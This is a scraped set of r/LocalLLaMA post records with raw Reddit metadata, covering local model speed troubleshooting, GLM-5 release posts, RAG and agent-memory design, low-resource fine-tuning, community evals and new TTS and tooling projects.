'https://external-preview.redd.it/ejI0Ym42Z2xmd2lnMajpRFyYFYkb08WrPvWRGjCM1ae0-ff96V1HBupVo5oy.png?width=320&crop=smart&format=pjpg&auto=webp&s=a98e6347dffbac0f429af204c4311fc60b0ad124', 'width': 320}, {'height': 361, 'url': 'https://external-preview.redd.it/ejI0Ym42Z2xmd2lnMajpRFyYFYkb08WrPvWRGjCM1ae0-ff96V1HBupVo5oy.png?width=640&crop=smart&format=pjpg&auto=webp&s=481cd2f1165545a82a13f13f872d360f9c5830df', 'width': 640}, {'height': 542, 
'url': 'https://external-preview.redd.it/ejI0Ym42Z2xmd2lnMajpRFyYFYkb08WrPvWRGjCM1ae0-ff96V1HBupVo5oy.png?width=960&crop=smart&format=pjpg&auto=webp&s=012ea2de9f3e6b8562a3d86736f071bd4c62e741', 'width': 960}, {'height': 610, 'url': 'https://external-preview.redd.it/ejI0Ym42Z2xmd2lnMajpRFyYFYkb08WrPvWRGjCM1ae0-ff96V1HBupVo5oy.png?width=1080&crop=smart&format=pjpg&auto=webp&s=3de27f5cdc0b45cddd6fcee092e99489a60cd622', 'width': 1080}], 'source': {'height': 1628, 'url': 'https://external-preview.redd.it/ejI0Ym42Z2xmd2lnMajpRFyYFYkb08WrPvWRGjCM1ae0-ff96V1HBupVo5oy.png?format=pjpg&auto=webp&s=0259a7a0c2824f394ba2762e6048a0911e6d4677', 'width': 2880}, 'variants': {}}]} | |
Qwen3-Next-Coder is almost unusable to me. Why? What did I miss? | 1 | Everyone talks about Qwen3-Next-Coder like it's some kind of miracle for local coding… yet I find it incredibly slow and almost unusable with OpenCode or Claude Code.
Today I was so frustrated that I literally took apart a second PC just to connect its GPU to mine and get more VRAM.
And still… it’s so slow that it’s basically unusable!
Maybe I’m doing something wrong using Q4\_K\_XL?
I’m sure the mistake is on my end — it can’t be that everyone loves this model and I’m the only one struggling.
I’ve also tried the smaller quantized versions, but they start making mistakes after around 400 lines of generated code — even with simple HTML or JavaScript.
I’m honestly speechless… everyone praising this model and I can’t get it to run decently.
For what it’s worth (which is nothing), I actually find GLM4.7-flash much more effective.
Maybe this is irrelevant, but just in case… I’m using Unsloth GGUFs and an updated version of llama.cpp.
Can anyone help me understand what I’m doing wrong?
This is how I’m launching the local llama-server, and I did a LOT of tests to improve things:
llama-server --model models\Qwen3-Coder-Next-UD-Q4_K_XL.gguf \
--alias "unsloth/Qwen3-Coder-Next" \
--port 8001 \
--ctx-size 32072 \
--ubatch-size 4096 \
--batch-size 4096 \
--flash-attn on \
--fit on \
--seed 3407 \
--temp 1.0 \
--top-p 0.95 \
--min-p 0.01 \
--top-k 40 \
--jinja
At first I left the KV cache at default (FP16, I think), then I reduced it and only saw a drop in TPS… I mean, with just a few dozen tokens per second fixed, it’s impossible to work efficiently. | 2026-02-11T17:16:47 | https://www.reddit.com/r/LocalLLaMA/comments/1r23b0u/qwen3nextcoder_is_almost_unusable_to_me_why_what/ | Medium-Technology-79 | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r23b0u | false | null | t3_1r23b0u | /r/LocalLLaMA/comments/1r23b0u/qwen3nextcoder_is_almost_unusable_to_me_why_what/ | false | false | self | 1 | null |
NeuroIndex | 0 | Most RAG systems fail because vector search alone is not enough.
They retrieve similar chunks — but miss relationships.
So I built NeuroIndex:
A hybrid Vector + Semantic Graph architecture that improves retrieval depth for LLM applications.
It combines:
* Vector similarity
* Entity relationship mapping
* Context linking
Result: More structured and explainable RAG outputs.
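A minimal sketch of the hybrid retrieval idea (toy data; the entity names, one-hop graph expansion, and the 0.5 weight are illustrative choices on my part, not NeuroIndex's actual implementation):

```python
import math

# Toy corpus: each chunk has an embedding and the entities it mentions.
chunks = {
    "c1": {"vec": [1.0, 0.0], "entities": {"postgres"}},
    "c2": {"vec": [0.9, 0.1], "entities": {"postgres", "migration"}},
    "c3": {"vec": [0.0, 1.0], "entities": {"redis"}},
}
# Entity relationship graph: entities linked if they co-occur.
graph = {"postgres": {"migration"}, "migration": {"postgres"}, "redis": set()}

def cosine(a, b):
    dot = sum(x * y for x, y in zip(a, b))
    na = math.sqrt(sum(x * x for x in a))
    nb = math.sqrt(sum(x * x for x in b))
    return dot / (na * nb)

def hybrid_retrieve(query_vec, query_entities, top_k=2):
    # Expand the query's entities one hop through the graph.
    expanded = set(query_entities)
    for e in query_entities:
        expanded |= graph.get(e, set())
    scored = []
    for cid, c in chunks.items():
        sim = cosine(query_vec, c["vec"])        # vector similarity
        overlap = len(c["entities"] & expanded)  # graph-linked entity overlap
        scored.append((sim + 0.5 * overlap, cid))  # weighted merge (weight arbitrary)
    return [cid for _, cid in sorted(scored, reverse=True)[:top_k]]

print(hybrid_retrieve([1.0, 0.0], {"migration"}))  # -> ['c2', 'c1']
```

Pure vector search alone would rank c1 first here; the graph expansion surfaces c2 because "migration" links to "postgres".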
Website: nidhitek
Looking for feedback from builders working on LLM infra. | 2026-02-11T17:11:03 | https://www.reddit.com/r/LocalLLaMA/comments/1r23532/neuroindex/ | OwnPerspective9543 | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r23532 | false | null | t3_1r23532 | /r/LocalLLaMA/comments/1r23532/neuroindex/ | false | false | self | 0 | null |
GLM-5 Benchmarks (model not yet published on HF) | 1 | 2026-02-11T16:57:35 | https://docs.z.ai/guides/llm/glm-5 | TheRealMasonMac | docs.z.ai | 1970-01-01T00:00:00 | 0 | {} | 1r22ris | false | null | t3_1r22ris | /r/LocalLLaMA/comments/1r22ris/glm5_benchmarks_model_not_yet_published_on_hf/ | false | false | 1 | {'enabled': False, 'images': [{'id': '711tjKjpilpDgegIwJ7SKMORRU0sheMZaG5F-f1PP40', 'resolutions': [{'height': 56, 'url': 'https://external-preview.redd.it/711tjKjpilpDgegIwJ7SKMORRU0sheMZaG5F-f1PP40.png?width=108&crop=smart&auto=webp&s=2b527b33b6ccb6922d82d0b228bdf231a2762989', 'width': 108}, {'height': 113, 'url': 'https://external-preview.redd.it/711tjKjpilpDgegIwJ7SKMORRU0sheMZaG5F-f1PP40.png?width=216&crop=smart&auto=webp&s=68196714293a29326c8c9f58ba2792a6075a4aac', 'width': 216}, {'height': 168, 'url': 'https://external-preview.redd.it/711tjKjpilpDgegIwJ7SKMORRU0sheMZaG5F-f1PP40.png?width=320&crop=smart&auto=webp&s=88aed924c6e2f9d514be4494953b6bb4e3c48930', 'width': 320}, {'height': 336, 'url': 'https://external-preview.redd.it/711tjKjpilpDgegIwJ7SKMORRU0sheMZaG5F-f1PP40.png?width=640&crop=smart&auto=webp&s=2aaf1c3749a75b5dcfc81db3d307d15ecaba1f98', 'width': 640}, {'height': 504, 'url': 'https://external-preview.redd.it/711tjKjpilpDgegIwJ7SKMORRU0sheMZaG5F-f1PP40.png?width=960&crop=smart&auto=webp&s=07b811e47fb88e514f93088f24e06c0f0076ccba', 'width': 960}, {'height': 567, 'url': 'https://external-preview.redd.it/711tjKjpilpDgegIwJ7SKMORRU0sheMZaG5F-f1PP40.png?width=1080&crop=smart&auto=webp&s=8edf9fb4f47853ff3eb9ac7b3da677ef3b34fe7d', 'width': 1080}], 'source': {'height': 630, 'url': 'https://external-preview.redd.it/711tjKjpilpDgegIwJ7SKMORRU0sheMZaG5F-f1PP40.png?auto=webp&s=073d1d2dc364d050e070eacaa0afc5c32a12fa56', 'width': 1200}, 'variants': {}}]} | ||
[Help] Fine-tuning Llama-3-8B for Low-Resource Language (Sinhala) - Stuck between "Bad Logic" and "Word Salad" | 7 | I am working on a project to build a story generation tool for children (Ages 6- 10) in Sinhala (a low-resource language), but I am hitting a critical roadblock with fine-tuning. I am using Unsloth with Llama-3-8B on an A100 GPU and have a dataset of \~2,500 stories. My issue is that the **Base model** (fine-tuned with Alpaca format) produces good grammar but complete nonsense logic (hallucinations like "Water is victory"), whereas the **Instruct model** (also fine-tuned with Alpaca format) attempts to follow logic but outputs broken "word salad" sentences. I suspect my prompt formatting is the issue with the Instruct model, but given the small dataset size, I am unsure if I should switch to the Llama-3 Chat Template with the Instruct model or simply train the Base model longer to fix the logic. Any advice on the best strategy for locking in grammar *and* logic for a non-English language would be appreciated. | 2026-02-11T16:52:48 | https://www.reddit.com/r/LocalLLaMA/comments/1r22myf/help_finetuning_llama38b_for_lowresource_language/ | Annual-Captain-7642 | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r22myf | false | null | t3_1r22myf | /r/LocalLLaMA/comments/1r22myf/help_finetuning_llama38b_for_lowresource_language/ | false | false | self | 7 | null |
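For reference, the Llama-3 chat template wraps each turn in header tokens rather than Alpaca's `### Instruction:` markers; a minimal sketch of rendering one training example that way (the system/user/assistant strings are placeholders):

```python
def llama3_format(system: str, user: str, assistant: str) -> str:
    """Render one example in the Llama-3 chat template
    (special tokens as defined by the Llama-3 tokenizer)."""
    return (
        "<|begin_of_text|>"
        f"<|start_header_id|>system<|end_header_id|>\n\n{system}<|eot_id|>"
        f"<|start_header_id|>user<|end_header_id|>\n\n{user}<|eot_id|>"
        f"<|start_header_id|>assistant<|end_header_id|>\n\n{assistant}<|eot_id|>"
    )

example = llama3_format(
    "You write Sinhala stories for children aged 6-10.",
    "Write a short story about a kind elephant.",
    "...",  # placeholder for the Sinhala story text
)
print(example.count("<|eot_id|>"))  # -> 3
```

In practice, `tokenizer.apply_chat_template` on the Instruct model's tokenizer produces this string for you, which avoids subtle mismatches between the training format and what the model saw during instruction tuning.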
Open-source AI coworker that builds a knowledge graph from your work (runs locally with Ollama) | 0 | We built a different approach to "AI memory" for work.
Instead of passing raw emails and meeting transcripts into a model each time, Rowboat maintains a continuously updated knowledge graph organized around people, projects, organizations, and topics.
Each node is stored as plain Markdown with backlinks, so it's human-readable and editable. The graph acts as an index over the structured notes. Rowboat runs background agents that convert raw data into linked notes while performing entity resolution.
An agent runs on top of that structure and retrieves relevant nodes before taking action.
The app runs locally, supports multiple LLM providers (including local models), and keeps the knowledge graph on your machine.
Still early and evolving. Curious how folks here think about this type of knowledge graph for work memory.
Demo: [https://www.youtube.com/watch?v=5AWoGo-L16I](https://www.youtube.com/watch?v=5AWoGo-L16I)
GitHub: [https://github.com/rowboatlabs/rowboat](https://github.com/rowboatlabs/rowboat) | 2026-02-11T16:47:33 | https://www.reddit.com/r/LocalLLaMA/comments/1r22hoh/opensource_ai_coworker_that_builds_a_knowledge/ | Prestigious_Peak_773 | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r22hoh | false | null | t3_1r22hoh | /r/LocalLLaMA/comments/1r22hoh/opensource_ai_coworker_that_builds_a_knowledge/ | false | false | self | 0 | {'enabled': False, 'images': [{'id': 'zhWxJShQ21vz_PzOWlpF1MldJL6nzK9om_pfvRATtRo', 'resolutions': [{'height': 81, 'url': 'https://external-preview.redd.it/zhWxJShQ21vz_PzOWlpF1MldJL6nzK9om_pfvRATtRo.jpeg?width=108&crop=smart&auto=webp&s=02ba5ef87cfbb0c37432303be8187c77a0259c5a', 'width': 108}, {'height': 162, 'url': 'https://external-preview.redd.it/zhWxJShQ21vz_PzOWlpF1MldJL6nzK9om_pfvRATtRo.jpeg?width=216&crop=smart&auto=webp&s=ac58751d4ed30a5541857f157ee4ccebf91c4dde', 'width': 216}, {'height': 240, 'url': 'https://external-preview.redd.it/zhWxJShQ21vz_PzOWlpF1MldJL6nzK9om_pfvRATtRo.jpeg?width=320&crop=smart&auto=webp&s=289b3a232902a54ab4a98014637ab955b426ee57', 'width': 320}], 'source': {'height': 360, 'url': 'https://external-preview.redd.it/zhWxJShQ21vz_PzOWlpF1MldJL6nzK9om_pfvRATtRo.jpeg?auto=webp&s=bf18dc6dd1ae7a8a010802c7ccbd5447c8b8a871', 'width': 480}, 'variants': {}}]} |
GLM-5 Officially Released | 753 | We are launching GLM-5, targeting complex systems engineering and long-horizon agentic tasks. Scaling is still one of the most important ways to improve the intelligence efficiency of Artificial General Intelligence (AGI). Compared to GLM-4.5, GLM-5 scales from 355B parameters (32B active) to 744B parameters (40B active), and increases pre-training data from 23T to 28.5T tokens. GLM-5 also integrates DeepSeek Sparse Attention (DSA), significantly reducing deployment cost while preserving long-context capacity.
Blog: https://z.ai/blog/glm-5
Hugging Face: https://huggingface.co/zai-org/GLM-5
GitHub: https://github.com/zai-org/GLM-5 | 2026-02-11T16:47:29 | https://www.reddit.com/gallery/1r22hlq | ResearchCrafty1804 | reddit.com | 1970-01-01T00:00:00 | 0 | {} | 1r22hlq | false | null | t3_1r22hlq | /r/LocalLLaMA/comments/1r22hlq/glm5_officially_released/ | false | false | 753 | null | |
GLM5 benchmarks | 29 | 2026-02-11T16:43:57 | https://www.reddit.com/r/LocalLLaMA/comments/1r22e37/glm5_benchmarks/ | Simple_Split5074 | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r22e37 | false | null | t3_1r22e37 | /r/LocalLLaMA/comments/1r22e37/glm5_benchmarks/ | false | false | 29 | null | ||
GLM-5: From Vibe Coding to Agentic Engineering | 52 | 2026-02-11T16:42:30 | https://z.ai/blog/glm-5 | ShreckAndDonkey123 | z.ai | 1970-01-01T00:00:00 | 0 | {} | 1r22co6 | false | null | t3_1r22co6 | /r/LocalLLaMA/comments/1r22co6/glm5_from_vibe_coding_to_agentic_engineering/ | false | false | default | 52 | null | |
RLHF limits what LLMs can claim, not what they can do — 26 experimental conditions across Claude Haiku and Sonnet | 0 | 2026-02-11T16:33:10 | https://emberverse.ai/haiku-garden/paper_yellow_wallpaper_problem.html | Odd_Rule_3745 | emberverse.ai | 1970-01-01T00:00:00 | 0 | {} | 1r223h8 | false | null | t3_1r223h8 | /r/LocalLLaMA/comments/1r223h8/rlhf_limits_what_llms_can_claim_not_what_they_can/ | false | false | default | 0 | null | |
Community Evals on Hugging Face | 25 | hey! I'm Nathan (SaylorTwift) from huggingface. we have a big update from the hf hub that actually fixes one of the most annoying things about model evaluation.
[Humanity's Last exam dataset on Hugging Face](https://preview.redd.it/iijfx1dk5wig1.png?width=1049&format=png&auto=webp&s=1a544cd848e26b2ff06d926dae85d711495f3bb6)
community evals are now live on huggingface! it's a decentralized, transparent way for the community to report and share model evaluations.
why?
everyone’s stats are scattered across papers, model cards, and platforms, and they sometimes contradict each other. there’s no unified single source of truth. community evals aim to fix that by making eval reporting open and reproducible.
what's changed?
* benchmarks host leaderboards right in the dataset repo (e.g. mmlu-pro, gpqa, hle)
* models store their own results in .eval\_results/\*.yaml and they show up on model cards and feed into the dataset leaderboards.
* anyone can submit eval results via a pr without needing the model author to merge. those show up as community results.
the key idea is that scores aren’t hidden in black-box leaderboards anymore. everyone can see who ran what, how, and when, and build tools, dashboards, comparisons on top of that!
If you want to [read more](https://huggingface.co/blog/community-evals) | 2026-02-11T16:23:19 | https://www.reddit.com/r/LocalLLaMA/comments/1r21tzb/community_evals_on_hugging_face/ | HauntingMoment | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r21tzb | false | null | t3_1r21tzb | /r/LocalLLaMA/comments/1r21tzb/community_evals_on_hugging_face/ | false | false | 25 | null | |
We've built memory into 4 different agent systems. Here's what actually works and what's a waste of time. | 34 | After building memory layers for multiple agent setups, here's the shit nobody tells you in the tutorials.
**What's a waste of time:**
\- **"Just use a vector store"** \-- Congrats, you built keyword search with extra steps and worse debugging. Embeddings are great for fuzzy matching, terrible for precise retrieval. Your agent will confidently pull up something *semantically similar* instead of the *actual thing it needs*.
\- **Dumping full conversation logs as memory** \-- Your agent doesn't need to remember that the user said "thanks" 47 times. Unfiltered logs are noise with a few signal fragments buried in them. And you're burning tokens retrieving garbage.
\- **One retrieval strategy** \-- If you're only doing semantic search, you're missing exact matches. If you're only doing keyword search, you're missing relationships. Pick one and you'll spend months wondering why retrieval "feels off."
**What actually works:**
\- **Entity resolution pipelines.** Actively identify and link entities across conversations. "The Postgres migration," "that DB move we discussed," and "the thing Jake proposed last Tuesday" are the same thing. If your memory doesn't know that, it's broken.
\- **Temporal tagging.** When was this learned? Is it still valid? A decision from 3 months ago might be reversed. If your memory treats everything as equally fresh, your agent will confidently act on outdated context. Timestamps aren't metadata. They're core to whether a memory is useful.
\- **Explicit priority systems.** Not everything is worth remembering. Let users or systems mark what matters and what should decay. Without this you end up with a memory that "remembers" everything equally, which means it effectively remembers nothing.
\- **Contradiction detection.** Your system will inevitably store conflicting information. "We're using Redis for caching" and "We moved off Redis last sprint." If you silently store both, your agent flips a coin on which one it retrieves. Flag conflicts. Surface them. Let a human resolve it.
\- **Multi-strategy retrieval.** Run keyword, semantic, and graph traversal in parallel. Merge results. The answer to "why did we pick this architecture?" might be spread across a design doc, a Slack thread, and a PR description. No single strategy finds all three.
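A toy sketch of that multi-strategy merge using reciprocal rank fusion (the corpus, the precomputed similarity scores, and the k=60 constant are all illustrative assumptions):

```python
def keyword_rank(query, docs):
    # Naive keyword strategy: rank by term overlap.
    q = set(query.lower().split())
    return sorted(docs, key=lambda d: -len(q & set(d.lower().split())))

def semantic_rank(query, docs, scores):
    # Stand-in for an embedding search: precomputed similarity scores.
    return sorted(docs, key=lambda d: -scores[d])

def rrf_merge(rankings, k=60):
    # Reciprocal Rank Fusion: score(d) = sum over rankings of 1/(k + rank).
    fused = {}
    for ranking in rankings:
        for rank, d in enumerate(ranking):
            fused[d] = fused.get(d, 0.0) + 1.0 / (k + rank + 1)
    return sorted(fused, key=fused.get, reverse=True)

docs = ["redis caching decision", "postgres migration plan", "sprint notes"]
sem_scores = {"redis caching decision": 0.2,
              "postgres migration plan": 0.9,
              "sprint notes": 0.1}
merged = rrf_merge([
    keyword_rank("postgres migration", docs),
    semantic_rank("postgres migration", docs, sem_scores),
])
print(merged[0])  # -> postgres migration plan
```

The nice property of rank fusion is that the strategies don't need comparable scores: only their orderings are merged, so adding a graph-traversal ranking later is just one more list in `rankings`.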
**The uncomfortable truth:**
None of this "solves" memory. These are tactical patches for specific retrieval problems. But implemented carefully, they make systems that *feel* like memory instead of feeling like a database you have to babysit.
The bar isn't "perfect recall." The bar is "better than asking the same question twice."
What's actually working in your setups? | 2026-02-11T16:17:39 | https://www.reddit.com/r/LocalLLaMA/comments/1r21ojm/weve_built_memory_into_4_different_agent_systems/ | arapkuliev | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r21ojm | false | null | t3_1r21ojm | /r/LocalLLaMA/comments/1r21ojm/weve_built_memory_into_4_different_agent_systems/ | false | false | self | 34 | null |
new to coding LLM - hardware requirements | 0 | I am new to this kind of stuff, but I plan to use it in my daily work as software developer.
I have some i7 11800H, A3000, 64 GB notebook as working device.
I am not quite sure about the model, but I planned to try qwen3 and 14B model with q4 should run on the device, and also the 30B and 32B might work, maybe q2 version?
ChatGPT tells me I could expect 5-15TPS, which is not ideal. Also it freezes all my resources for the LLM and if I want the run I would need the gpu anyway and I guess I would need to close OpenCode and the LLM before, which is rather annoying.
I also have a Mac Studio M2 Max with 32GB RAM, which should work with the 14B model, the 30B and 32B might not work and sadly I cannot upgrade the RAM. A benefit of that Apple Silicon seems the architecture and those MLX stuff and according to ChatGPT I should expect 25-60 TPS which would be quite good.
I switched to a Macbook Pro M4 Max with 36GB as private main device 1 year ago, so I don't use the Mac Studio anymore, so I maybe could use that as private LLM server for open code, so I can use it with my working device, as well as with my private Macbook? Is there a better model that I could use than qwen3 14B or is it sufficient? Our company has a really large project, does qwen3 14B and OpenCode understand this and knows our internal SDK if I give them the repository? It seems there is something called RAG I need there? Is it enough to have that repository on my working device and OpenCode runs there locally and sends the necessary information via API to my Mac Studio?
Is there a better model for my needs and hardware I got?
It seems we have been able to use Claude with Ollama for some weeks now, but there is also OpenCode. I thought about using OpenCode, but I saw some videos about Claude, and e.g. the switch between modes like plan mode seems nice to have; I'm not sure if OpenCode has that function too.
Using my MacBook Pro M4 Max 36GB as an LLM server for my work device would also not make much sense, I guess. The CPU might not be the limitation, but would 4GB more RAM help? I am also very sceptical, since it seems my Mac would always be at its limit when using a local LLM. Is that the case: is it at ~100% utilization while it generates code for me, dropping back to something like 10% once it is finished, or does it also consume that much power and resources while idle? The Mac Studio would have better cooling, I guess, and I think there was also some kind of cooling stand for it. So I think the Mac Studio would be the better option? | 2026-02-11T16:17:32 | https://www.reddit.com/r/LocalLLaMA/comments/1r21of6/new_to_coding_llm_hardware_requirements/ | SubstantialBee5097 | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r21of6 | false | null | t3_1r21of6 | /r/LocalLLaMA/comments/1r21of6/new_to_coding_llm_hardware_requirements/ | false | false | self | 0 | null |
Add Kimi-K2.5 support | 90 | 2026-02-11T15:48:39 | https://github.com/ggml-org/llama.cpp/pull/19170 | jacek2023 | github.com | 1970-01-01T00:00:00 | 0 | {} | 1r20wki | false | null | t3_1r20wki | /r/LocalLLaMA/comments/1r20wki/add_kimik25_support/ | false | false | 90 | {'enabled': False, 'images': [{'id': '5gup_oD4lytsLI1wID-Zo3RkPiRxiRbU2Hm7r-fkB2I', 'resolutions': [{'height': 54, 'url': 'https://external-preview.redd.it/5gup_oD4lytsLI1wID-Zo3RkPiRxiRbU2Hm7r-fkB2I.png?width=108&crop=smart&auto=webp&s=6461068566b4ffbf2ea8bd9f53ee47ad99b85ee8', 'width': 108}, {'height': 108, 'url': 'https://external-preview.redd.it/5gup_oD4lytsLI1wID-Zo3RkPiRxiRbU2Hm7r-fkB2I.png?width=216&crop=smart&auto=webp&s=7b53d2f0b6772f9e0435874ff1689da90a9a6dec', 'width': 216}, {'height': 160, 'url': 'https://external-preview.redd.it/5gup_oD4lytsLI1wID-Zo3RkPiRxiRbU2Hm7r-fkB2I.png?width=320&crop=smart&auto=webp&s=11fd89e010ee5ce616013a57e224da3675b63271', 'width': 320}, {'height': 320, 'url': 'https://external-preview.redd.it/5gup_oD4lytsLI1wID-Zo3RkPiRxiRbU2Hm7r-fkB2I.png?width=640&crop=smart&auto=webp&s=58c51ab74c9a734ec60838d3f67b78c6df26076b', 'width': 640}, {'height': 480, 'url': 'https://external-preview.redd.it/5gup_oD4lytsLI1wID-Zo3RkPiRxiRbU2Hm7r-fkB2I.png?width=960&crop=smart&auto=webp&s=e6ad5d712e6f2652a41095e67f5cfde14d21bb39', 'width': 960}, {'height': 540, 'url': 'https://external-preview.redd.it/5gup_oD4lytsLI1wID-Zo3RkPiRxiRbU2Hm7r-fkB2I.png?width=1080&crop=smart&auto=webp&s=842e6308be3dff66da2e2109c3cdc0c09427f6b9', 'width': 1080}], 'source': {'height': 600, 'url': 'https://external-preview.redd.it/5gup_oD4lytsLI1wID-Zo3RkPiRxiRbU2Hm7r-fkB2I.png?auto=webp&s=5b55aeed4446b5b24cf06dd7246f7e664672cc9b', 'width': 1200}, 'variants': {}}]} | ||
Releasing MioTTS: A family of lightweight, fast LLM-based TTS models (0.1B - 2.6B) with Zero-shot Voice Cloning | 60 | Hey r/LocalLLaMA,
I’ve been developing a personal project to create a lightweight and fast TTS model. Today I’m releasing **MioTTS**, a family of LLM-based models ranging from **0.1B to 2.6B** parameters.
The main focus was to achieve high-fidelity audio at the 0.1B parameter scale. I wanted to see how efficient it could be while maintaining quality, so I also developed a custom neural audio codec (**MioCodec**) to minimize latency.
**Key Features:**
* **Zero-shot Voice Cloning:** Supports high-fidelity cloning from short reference audio.
* **Bilingual:** Trained on \~100k hours of English and Japanese speech data.
* **Custom Codec:** Built on top of **MioCodec**, a custom neural audio codec I developed to allow for faster generation (low token rate) while maintaining audio fidelity. The codec is also released under MIT license.
**Model Family:**
I’ve released multiple sizes to balance quality and resource usage. Licenses depend on the base model used.
|Model|Base Model|License|RTF (approx.)|
|:-|:-|:-|:-|
|**0.1B**|Falcon-H1-Tiny|Falcon-LLM|0.04 - 0.05|
|**0.4B**|LFM2-350M|LFM Open v1.0|0.035 - 0.045|
|**0.6B**|Qwen3-0.6B|Apache 2.0|0.055 - 0.065|
|**1.2B**|LFM2.5-1.2B|LFM Open v1.0|0.065 - 0.075|
|**1.7B**|Qwen3-1.7B|Apache 2.0|0.10 - 0.11|
|**2.6B**|LFM2-2.6B|LFM Open v1.0|0.135 - 0.145|
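For context on the RTF column, assuming it is the usual real-time factor (synthesis time divided by audio duration; that reading is my assumption, the repo defines the exact measurement), a value below 1.0 means faster-than-real-time generation:

```python
def rtf(generation_seconds: float, audio_seconds: float) -> float:
    """Real-time factor: generation time / audio duration; < 1.0 is faster than real time."""
    return generation_seconds / audio_seconds

# e.g. the 0.1B model at RTF 0.05: a 10 s clip takes about 0.5 s to generate
print(rtf(0.5, 10.0))  # -> 0.05
```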
I'd love to hear your feedback, especially on the English prosody (since I primarily develop in Japanese) and inference speeds on different hardware.
**Links:**
* **Model Collection:** [https://huggingface.co/collections/Aratako/miotts](https://huggingface.co/collections/Aratako/miotts)
* **Inference Code:** [https://github.com/Aratako/MioTTS-Inference](https://github.com/Aratako/MioTTS-Inference)
* **Demo (0.1B):** [https://huggingface.co/spaces/Aratako/MioTTS-0.1B-Demo](https://huggingface.co/spaces/Aratako/MioTTS-0.1B-Demo)
Thanks for checking it out! | 2026-02-11T15:46:56 | https://www.reddit.com/r/LocalLLaMA/comments/1r20uwk/releasing_miotts_a_family_of_lightweight_fast/ | Askxc | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r20uwk | false | null | t3_1r20uwk | /r/LocalLLaMA/comments/1r20uwk/releasing_miotts_a_family_of_lightweight_fast/ | false | false | self | 60 | {'enabled': False, 'images': [{'id': 'GvCI9r7clboBsw15C_RBC1DocY_sNLE6v3oaQer8sLI', 'resolutions': [{'height': 58, 'url': 'https://external-preview.redd.it/GvCI9r7clboBsw15C_RBC1DocY_sNLE6v3oaQer8sLI.png?width=108&crop=smart&auto=webp&s=686ce73862c94180eecf52e4f992ae03abf8db7a', 'width': 108}, {'height': 116, 'url': 'https://external-preview.redd.it/GvCI9r7clboBsw15C_RBC1DocY_sNLE6v3oaQer8sLI.png?width=216&crop=smart&auto=webp&s=2d73811f9a8ffc8975ced6791aeaf0e06d2ef9d9', 'width': 216}, {'height': 172, 'url': 'https://external-preview.redd.it/GvCI9r7clboBsw15C_RBC1DocY_sNLE6v3oaQer8sLI.png?width=320&crop=smart&auto=webp&s=41133aa7242cc8b1c0b9be6f2f02e6a5c92f9e3e', 'width': 320}, {'height': 345, 'url': 'https://external-preview.redd.it/GvCI9r7clboBsw15C_RBC1DocY_sNLE6v3oaQer8sLI.png?width=640&crop=smart&auto=webp&s=f1f35fe3cf0d68be727cdcff1a8fbe1886274aec', 'width': 640}, {'height': 518, 'url': 'https://external-preview.redd.it/GvCI9r7clboBsw15C_RBC1DocY_sNLE6v3oaQer8sLI.png?width=960&crop=smart&auto=webp&s=e9e67cfb12ff9795a6a9e919f181da89dd519d3d', 'width': 960}, {'height': 583, 'url': 'https://external-preview.redd.it/GvCI9r7clboBsw15C_RBC1DocY_sNLE6v3oaQer8sLI.png?width=1080&crop=smart&auto=webp&s=4878e82bda62199bbd46e8172cf8eca61ea8bfdb', 'width': 1080}], 'source': {'height': 648, 'url': 'https://external-preview.redd.it/GvCI9r7clboBsw15C_RBC1DocY_sNLE6v3oaQer8sLI.png?auto=webp&s=cf3a2b7b872acb3309cedacae10f032e3191afa3', 'width': 1200}, 'variants': {}}]} |
Prompt Mixer - a desktop app to steer your LLM in real-time. | 1 | **What is this?**
A desktop app that allows you to define a set of system prompts and dynamically steer the LLM output between them in real time. It works with local LLMs and aims to explore what high-level control of LLMs/agents might look like in the future.
You can find the project source code here:
[https://github.com/Jitera-Labs/prompt\_mixer.exe](https://github.com/Jitera-Labs/prompt_mixer.exe) | 2026-02-11T15:46:24 | https://v.redd.it/1ncpctr3zvig1 | Everlier | /r/LocalLLaMA/comments/1r20udz/prompt_mixer_a_desktop_app_to_steer_your_llm_in/ | 1970-01-01T00:00:00 | 0 | {} | 1r20udz | false | {'reddit_video': {'bitrate_kbps': 5000, 'dash_url': 'https://v.redd.it/1ncpctr3zvig1/DASHPlaylist.mpd?a=1773546394%2CM2ZhYjE5YmYxZGQ1NmRlM2Y4ZjY0YjFjMzA1YjBhYmNiMWY2YWQ5YjFkOWMyYzFmYzU4YWFiZjBlMzgwZWIxMQ%3D%3D&v=1&f=sd', 'duration': 98, 'fallback_url': 'https://v.redd.it/1ncpctr3zvig1/CMAF_1080.mp4?source=fallback', 'has_audio': False, 'height': 1080, 'hls_url': 'https://v.redd.it/1ncpctr3zvig1/HLSPlaylist.m3u8?a=1773546394%2CZjY2NzRlM2QxZmQ4MjVkODVhZjQyMGVjNWE2NTg2NzU2MzE1MmZmOWMxMjhlYzRhNWQ5NTgzMDM1NDliYmE1Zg%3D%3D&v=1&f=sd', 'is_gif': False, 'scrubber_media_url': 'https://v.redd.it/1ncpctr3zvig1/CMAF_96.mp4', 'transcoding_status': 'completed', 'width': 1686}} | t3_1r20udz | /r/LocalLLaMA/comments/1r20udz/prompt_mixer_a_desktop_app_to_steer_your_llm_in/ | false | false | 1 | {'enabled': False, 'images': [{'id': 'aDd0MG8wczN6dmlnMarrnhoRDFUm0baQWTGT_UocziHYnRfcPAE_9rBN0UXz', 'resolutions': [{'height': 69, 'url': 'https://external-preview.redd.it/aDd0MG8wczN6dmlnMarrnhoRDFUm0baQWTGT_UocziHYnRfcPAE_9rBN0UXz.png?width=108&crop=smart&format=pjpg&auto=webp&s=a9d51b6fabe38ad96be699e160e83e71772c3627', 'width': 108}, {'height': 138, 'url': 'https://external-preview.redd.it/aDd0MG8wczN6dmlnMarrnhoRDFUm0baQWTGT_UocziHYnRfcPAE_9rBN0UXz.png?width=216&crop=smart&format=pjpg&auto=webp&s=f70f89c28ca744cf5eb4598b0579aa92c476a54b', 'width': 216}, {'height': 204, 'url': 